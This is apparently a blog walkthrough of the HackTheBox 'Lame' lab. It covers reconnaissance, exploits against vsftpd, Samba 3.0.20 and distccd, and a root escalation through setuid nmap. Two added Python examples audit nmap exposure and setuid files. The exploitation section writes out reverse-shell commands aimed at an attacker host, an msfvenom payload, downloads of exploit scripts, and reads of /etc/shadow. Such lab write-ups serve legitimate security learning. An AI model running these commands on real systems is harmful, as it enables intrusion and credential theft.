HackTheBox: Lame

ratiros01
5 min read · Jun 7, 2020


[Reconnaissance]

1. Port Scan

nmap -Pn <ip>

2. High port number scan

nmap -Pn -p- <ip>

Ports 21, 22, 139, 445, and 3632 are open.


3. Scan for everything

nmap -A -p-3632 <ip>

The scan shows FTP with anonymous login allowed (vsFTPd 2.3.4), OpenSSH 4.7p1, Samba 3.0.20, and distccd.

4. Vulnerability scan

nmap --script vuln <ip>

Nothing useful.

5. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

There are two interesting share paths: /opt and /tmp.
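The reconnaissance above is done by reading nmap output by eye. As an added example (not part of the original writeup), the script below parses nmap's grepable (-oG) output into a service inventory and then applies a simple exposure policy to it, which is how a defender turns the same scan into a finding list. The sample scan text is constructed to mirror the five ports found above, and the policy set (anonymous FTP, SMB and distcc should not face an untrusted network) is an assumption for this example.

```python
import re

# Constructed sample of nmap grepable (-oG) output covering the five ports the
# writeup found. The host line layout is nmap's own; the version strings are
# illustrative and not copied from the box.
SAMPLE_OG = (
    "# Nmap 7.80 scan initiated (constructed sample)\n"
    "Host: 10.10.10.3 ()\tStatus: Up\n"
    "Host: 10.10.10.3 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)/, "
    "3632/open/tcp//distccd//distccd v1 ((GNU) 4.2.4)/"
    "\tIgnored State: closed (65530)\n"
    "# Nmap done (constructed sample)\n"
)

# Exposure policy for this example (an assumption, not from the writeup):
# services a general-purpose server should not offer to an untrusted network.
UNWANTED_SERVICES = frozenset({"ftp", "netbios-ssn", "distccd"})

_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")


def parse_grepable(text):
    """Parse nmap -oG output into (host, port, proto, state, service, version) tuples.

    Each Ports: entry has the layout port/state/proto/owner/service/rpc_info/version/;
    the split is bounded so a '/' inside the version string is preserved.
    """
    records = []
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if not m:
            continue
        host, ports_field = m.groups()
        for entry in ports_field.split(", "):
            fields = entry.split("/", 6)
            if len(fields) != 7:
                continue  # malformed entry: skip rather than guess
            port, state, proto, _owner, service, _rpc, version = fields
            records.append((host, int(port), proto, state, service, version.rstrip("/")))
    return records


def exposure_findings(records, unwanted=UNWANTED_SERVICES):
    """Return the open services that violate the exposure policy."""
    return [
        (host, port, service, version)
        for host, port, _proto, state, service, version in records
        if state == "open" and service in unwanted
    ]


if __name__ == "__main__":
    recs = parse_grepable(SAMPLE_OG)
    for host, port, proto, state, service, version in recs:
        print(f"{host}:{port}/{proto} {state:<6} {service:<12} {version}")
    for host, port, service, version in exposure_findings(recs):
        print(f"FINDING {host}:{port} {service} ({version}) should not be exposed")
```

Run it against a real scan with `nmap -sV -oG scan.gnmap <target>` and feed the file contents to `parse_grepable`; the version column is what you compare against your patch inventory, and the policy set is where you encode what each host is actually allowed to expose.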

[Exploitation]

1. FTP

Log in as anonymous.

ftp <ip>
ls

Nothing useful.

Search for exploits

searchsploit vsftpd

There's a backdoor command execution module, but I won't use Metasploit.

Searching Google for a vsftpd 2.3.4 exploit, I came across this.

wget https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
python3 vsftpd_234_exploit.py <ip> <port> whoami

Failed!!!

3. Samba

smbclient //10.10.10.3/anonymous

Failed!!!

wget https://raw.githubusercontent.com/macha97/exploit-smb-3.0.20/master/exploit-smb-3.0.20.py

Looking at the code, I have to replace the shellcode.

Generate a new payload with msfvenom.

msfvenom -p cmd/unix/reverse_netcat LHOST=<ip> LPORT=1234 -f python

Replace the shellcode in the script.

Create a listener.

nc -lvp 1234

Run the exploit.

python exploit-smb-3.0.20.py

Now I have a shell.

id

Spawn TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

4. Distcc

Search for exploits

searchsploit distcc

There’s an exploit, but I won’t use Metasploit.

Searching Google for distcc, I came across this script.

https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

Try the script (the filename matches the one downloaded above).

python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c whoami

Let's get a reverse shell.

Set up a listener.

nc -lvp 1234

Try a reverse shell command. Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'

Failed!!!

Let's try another one.

python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c 'nc -e /bin/sh <attacker ip> 1234'

Now I have a connection.

id

Spawn a TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'

Check the /etc/passwd permissions.

ls -l /etc/passwd

I cannot edit it, since it belongs to root.

Verify that I can run sudo.

sudo -l

I can’t.

Try to read the shadow file.

cat /etc/shadow

Look for a shadow backup.

find / 2>>/dev/null | grep "shadow"

Read the file.

cat /var/backups/shadow.bak

Failed!!!

Search for SUID binaries.

find / -perm -u=s -type f 2>/dev/null

nmap is SUID, so I may be able to escalate privileges with it.

nmap --interactive
!sh

Verify the current user.

id
whoami

Now, I am root.

cd /home/makis
cat user.txt
cd /root
cat root.txt
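The root step above works only because nmap is installed setuid root on the box, which is exactly what `find / -perm -u=s -type f` surfaces. As an added example (not part of the original writeup), the audit below does the defender's version of that search: it classifies every setuid regular file as either expected (in a baseline allowlist), setuid-root but unexpected, or setuid to a non-root user, which `-perm -u=s` alone does not distinguish. The baseline list and the sample file entries are constructed for this example; `collect_entries` gathers the real data from a live host.

```python
import os
import stat

# Baseline of setuid-root binaries normally expected on a Debian/Ubuntu host
# (an assumption for this example; tailor it to your own build image).
EXPECTED_SETUID_ROOT = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
})

# Constructed sample of (path, st_mode, st_uid) as os.lstat() would report.
# 0o104755 = regular file (0o100000) | setuid bit (0o4000) | rwxr-xr-x.
SAMPLE_ENTRIES = [
    ("/bin/su",         0o104755, 0),     # expected setuid root
    ("/usr/bin/passwd", 0o104755, 0),     # expected setuid root
    ("/usr/bin/nmap",   0o104755, 0),     # setuid root but NOT in the baseline
    ("/usr/bin/vim",    0o100755, 0),     # ordinary binary, no setuid
    ("/tmp/helper",     0o104755, 1000),  # setuid, but to an unprivileged uid
    ("/etc/shadow",     0o100640, 0),     # sensitive file, not setuid
]


def is_setuid_file(mode):
    """True for a regular file with the setuid bit set (what find -perm -u=s -type f matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def audit_setuid(entries, baseline=EXPECTED_SETUID_ROOT):
    """Return sorted (path, reason) pairs for every setuid file that needs review.

    find -perm -u=s lists setuid files regardless of owner, so the audit separates
    the two cases that matter: setuid-root binaries outside the baseline, and
    setuid binaries owned by a non-root user (often a dropped helper in /tmp).
    """
    findings = []
    for path, mode, uid in entries:
        if not is_setuid_file(mode):
            continue
        if uid != 0:
            findings.append((path, f"setuid binary owned by uid {uid}"))
        elif path not in baseline:
            findings.append((path, "setuid-root binary not in baseline"))
    return sorted(findings)


def collect_entries(root="/"):
    """Walk the real filesystem and gather (path, st_mode, st_uid) for every file."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished between listing and stat; skip
            entries.append((path, st.st_mode, st.st_uid))
    return entries


if __name__ == "__main__":
    for path, reason in audit_setuid(SAMPLE_ENTRIES):
        print(f"{path}: {reason}")
```

On a real host, replace `SAMPLE_ENTRIES` with `collect_entries()`; the fix for a finding like `/usr/bin/nmap` is to drop the bit (`chmod u-s /usr/bin/nmap`) and, if raw-socket scanning is genuinely required, to grant `cap_net_raw` instead of full root. Re-run the audit on every image build so new setuid files show up as a diff against the baseline rather than as a surprise during an incident.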
